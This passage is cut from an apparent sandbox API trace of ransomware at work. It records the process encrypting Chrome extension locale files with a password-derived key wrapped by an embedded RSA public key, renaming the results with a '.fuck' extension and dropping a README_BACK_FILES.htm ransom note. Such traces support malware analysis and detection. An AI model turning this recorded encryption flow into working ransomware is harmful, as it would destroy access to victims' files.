lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.621] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.621] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.621] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.621] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.621] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.621] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.621] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.621] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.621] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.621] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.621] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.622] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.622] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.622] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.622] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.622] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.622] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.622] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.623] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.623] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.623] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x129, lpOverlapped=0x0) returned 1 [0262.623] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x129, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0262.623] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0262.623] CloseHandle (hObject=0x5d5c) returned 1 [0262.623] CloseHandle (hObject=0x5d60) returned 1 [0262.623] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0262.627] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0262.627] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.gsg")) returned 1 [0262.628] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.fuck")) returned 1 [0262.629] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.629] CryptDestroyKey (hKey=0x2e7dac0) returned 1 [0262.629] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.629] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.629] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.629] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0262.629] AreFileApisANSI () returned 1 [0262.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.630] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.630] GetFileType (hFile=0x5d64) returned 0x1 [0262.630] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.631] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.631] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.632] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.632] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.632] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.632] GetLastError () returned 0x0 [0262.632] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json")) returned 0x20 [0262.632] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0262.632] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.633] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.634] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.634] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.636] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.636] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.636] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.636] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0262.636] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.636] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.636] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73130) returned 1 [0262.637] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73130, dwCertEncodingType=0x1, pInfo=0x2eadc40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eadc70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eadc78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7dac0) returned 1 [0262.637] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.637] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e731b8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e731b8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.637] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e731b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e731b8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.638] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.647] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.647] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.662] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.662] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.662] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.662] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.662] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.662] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.662] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.662] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.662] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.662] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.663] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.663] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.663] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.663] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.663] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, 